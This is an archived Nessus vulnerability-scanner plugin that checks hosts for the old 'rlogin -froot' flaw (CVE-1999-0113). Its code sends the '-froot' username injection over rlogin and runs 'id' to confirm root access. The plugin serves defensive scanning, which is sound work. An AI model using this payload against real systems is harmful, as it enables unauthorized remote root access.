home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / rlogin_froot.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  74 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10161);
  10.  script_bugtraq_id(458);
  11.  script_version ("$Revision: 1.5 $");
  12.  script_cve_id("CVE-1999-0113");
  13.  name["english"] = "rlogin -froot";
  14.  name["francais"] = "rlogin -froot";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "
  18. The remote /bin/login seems to be vulnerable to the old
  19. 'rlogin -froot' bug.
  20.  
  21. Any attacker may use this old flaw to gain root access
  22. on this system.
  23.  
  24. Solution : Upgrade your /bin/login, or comment out the 'rlogin' line in 
  25. /etc/inetd.conf and restart the inetd process
  26.  
  27. Risk factor : High";
  28.  
  29.  
  30.  
  31.  script_description(english:desc["english"]);
  32.  
  33.  summary["english"] = "Checks for rlogin -froot";
  34.  
  35.  script_summary(english:summary["english"]);
  36.  
  37.  script_category(ACT_GATHER_INFO);
  38.  
  39.  
  40.  script_copyright(english:"This script is Copyright (C) 2002 Renaud Deraison");
  41.  family["english"] = "Gain root remotely";
  42.  script_family(english:family["english"]);
  43.  script_dependencie("find_service.nes");
  44.  script_require_ports("Services/rlogin", 513);
  45.  exit(0);
  46. }
  47.  
  48. #
  49. # The script code starts here
  50. #
  51.  
  52. port = get_kb_item("Services/rlogin");
  53. if(!port)port = 513;
  54.  
  55. if(get_port_state(port))
  56. {
  57.  soc = open_priv_sock_tcp(dport:port);
  58.  if(soc)
  59.  {
  60.   s1 = raw_string(0);
  61.   s2 = "-froot" + raw_string(0) + "-froot" + raw_string(0) + "id" + raw_string(0);
  62.   send(socket:soc, data:s1);
  63.   send(socket:soc, data:s2);
  64.   a = recv(socket:soc, length:1024, min:1);
  65.   if(strlen(a))
  66.    {
  67.    send(socket:soc, data:string("id\r\n"));
  68.    r = recv(socket:soc, length:4096);
  69.    if("uid=" >< r)security_hole(port);
  70.    }
  71.   close(soc);
  72.  }
  73. }
  74.